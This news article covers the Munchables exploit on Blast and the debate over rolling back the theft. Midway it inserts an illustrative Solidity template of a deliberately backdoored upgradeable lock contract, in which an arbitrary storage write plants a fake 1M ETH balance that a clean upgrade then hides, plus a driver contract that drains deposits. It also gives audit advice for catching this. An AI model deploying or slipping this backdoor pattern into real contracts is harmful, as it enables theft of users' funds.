Analysts Believe Munchables’ $63M Exploit Was Internally Engineered

Experts believe the Blast-based game’s $63 million hack may have been devised by a North Korean employee.

By: Samuel Haig

Munchables, a prominent web3 game and farm on the Blast Layer 2 network, has suffered a $63 million hack, igniting debate about whether the Blast team should roll back the malicious transaction.

The incident took place on March 26, with Munchables tweeting that it is actively tracking the flow of funds stolen in the exploit. Two-thirds of Munchables’ total value locked (TVL) was stolen as a result of the incident, with the protocol’s TVL sliding from $96.2 million to $34 million, according to DeFi Llama.

ZachXBT, a popular web3 analyst and sleuth, identified the attacker’s wallet on-chain. The address currently holds 17,412.65 Ether.

Pacman, Blast's pseudonymous founder and contributor, later tweeted that the funds were secured after the perpetrator voluntarily returned the assets. The hacker was confirmed to be a former Munchables developer.

Inside job

0xQuit, a Solidity auditor, said the protocol’s lock contract had been engineered from the outset, before Munchables launched, to lay the groundwork for the exploit.

They said the contract’s original implementation was unverified (no source code published on the block explorer) and allowed the attacker to assign themselves a deposited balance of up to 1 million ETH. It was then upgraded to a new implementation whose verified source concealed the planted balance.

“If you never knew about the original implementation, the contract would look just fine,” 0xQuit tweeted. “[The] scammer used manual manipulation of storage slots to assign himself an enormous Ether balance before changing the contract implementation to one that appears legit. Then he simply withdrew that balance once TVL was juicy enough.”
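The pattern 0xQuit describes, shown as an added illustration rather than Munchables’ actual code. The contract names, the storage layout, the `writeSlot` backdoor and the `Walkthrough` driver are all hypothetical; what is real is the mechanism: an upgradeable proxy keeps its state in its own storage, so a balance planted through one implementation survives a switch to a clean one.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical storage layout shared by the proxy and every implementation.
// Because the proxy delegatecalls into the implementation, all state lives in
// the proxy's storage and survives an upgrade; only the code reading it changes.
abstract contract LockStorage {
    address public owner;                         // slot 0
    address public implementation;                // slot 1
    mapping(address => uint256) public balances;  // slot 2
}

// Implementation A: the original, unverified code. Besides a normal deposit it
// carries an owner-only function that writes any storage slot of the proxy.
contract LockV1 is LockStorage {
    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Backdoor: arbitrary SSTORE into the proxy's storage.
    function writeSlot(bytes32 slot, bytes32 value) external {
        require(msg.sender == owner, "not owner");
        assembly { sstore(slot, value) }
    }
}

// Implementation B: the clean, verified code users and auditors later see.
// It has no way to mint a balance, so its source alone reveals nothing.
contract LockV2 is LockStorage {
    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient balance");
        balances[msg.sender] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Minimal upgradeable proxy. Every call is forwarded with delegatecall, so
// LockV1 and LockV2 both operate on this contract's slots.
contract LockProxy is LockStorage {
    constructor(address impl) {
        owner = msg.sender;
        implementation = impl;
    }

    function upgradeTo(address impl) external {
        require(msg.sender == owner, "not owner");
        implementation = impl;
    }

    fallback() external payable {
        address impl = implementation;
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Slot holding balances[who] for a mapping declared at slot 2: keccak256(key . slot).
function balanceSlot(address who) pure returns (bytes32) {
    return keccak256(abi.encode(who, uint256(2)));
}

// Hypothetical driver that runs the whole sequence in one transaction: plant the
// balance via V1, upgrade to V2, let deposits arrive, drain them with V2's withdraw.
contract Walkthrough {
    function run() external payable returns (uint256 planted, uint256 drained) {
        LockProxy proxy = new LockProxy(address(new LockV1()));  // this contract is owner

        // Step 1: through V1, write 1,000,000 ETH into balances[attacker].
        LockV1(address(proxy)).writeSlot(
            balanceSlot(address(this)), bytes32(uint256(1_000_000 ether))
        );

        // Step 2: swap in the clean implementation; the planted slot is untouched.
        proxy.upgradeTo(address(new LockV2()));
        planted = LockV2(address(proxy)).balances(address(this));  // 1,000,000 ETH

        // Step 3: deposits accumulate. Simulated here with the ETH sent to run();
        // in reality these would be other users' deposits.
        LockV2(address(proxy)).deposit{value: msg.value}();

        // Step 4: once TVL is large enough, withdraw everything the proxy holds.
        uint256 before = address(this).balance;
        LockV2(address(proxy)).withdraw(address(proxy).balance);
        drained = address(this).balance - before;
    }

    receive() external payable {}
}
```

The practical check this implies: a verified source for the current implementation says nothing about what earlier implementations wrote. An audit of a proxy should enumerate every implementation the proxy has ever pointed to (from upgrade events or the implementation slot’s history), inspect each one, including unverified bytecode, and reconcile the sum of recorded balances against the ETH that was actually deposited; a gap between the two is the planted balance.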

ZachXBT speculated that the attack may have been engineered by a North Korean developer hired by the Munchables team.

Onlookers debate network rollback

The incident gave rise to fervent discussion about how Blast should respond, since the Blast team controls the canonical bridge contract holding the deposited ETH on Ethereum mainnet and therefore has the ability to freeze the stolen funds or reverse the malicious transaction. Third-party bridges only front liquidity on the other side; they do not bypass that control.

0xQuit tweeted that third-party Blast bridges appear to have been disabled to protect their operators against potential losses. “Makes sense given the uncertainty,” 0xQuit tweeted. “If Blast rolls back… these bridges are out of pocket on everything they paid out to bridgers, and bridgers would double their money.”

DCF God, a popular crypto trader, said rolling back the exploit would not constitute a major departure from Blast’s existing ethos, since the network already has a centralized architecture.

“Don't think it's too crazy for Blast to freeze the underlying ETH from the Munchables exploit,” DCF God said. “It's not like other L2s because they manage the underlying deposits already.”

However, many onlookers warned that reversing transactions would set a poor precedent for the project moving forward.

“Technically, the Blast team could recover the $62m lost in the Munchables exploit since they control the bridge contract that holds the bridged ETH/stETH,” tweeted 0xCygaar, a contributor to Frame. “I don't think any rollup has done something like this on mainnet yet but the bridge contracts are upgradeable… It wouldn't set a good precedent for future exploits/issues, but it is possible.”

But many web3 users said they would prefer for Blast to roll back the chain to return assets to victims, despite the risks and centralization concerns associated with such a move.

“Blast can get $62m in stolen ETH back because it controls the bridge to mainnet,” tweeted Beanie, an NFT investor. “There’s literally no reason for Blast not to act for the benefit of its users.”

Brentsketit, a crypto commentator and investor, said they would feel “safer” engaging with a network that responds to exploits in a centralized manner. “As anti-crypto as that sounds, it seems crypto is nowhere close to its root anymore,” they tweeted.

Exploit pours cold water on Blast

The incident served as a dampener following Blast’s impressive but controversial mainnet launch four weeks ago.

Blast launched as the third-largest L2 with more than $2 billion in TVL, having accepted deposits into a one-way bridging contract since it announced its launch plans in November.

However, the launch campaign, which offered users yields via third-party protocols in addition to Blast points, was criticized for demanding users’ trust without publishing any code or audits, and for using incentive structures borrowed from multi-level-marketing schemes.

Blast is now the third-ranked L2 with a network TVL of $2.7 billion, according to L2beat.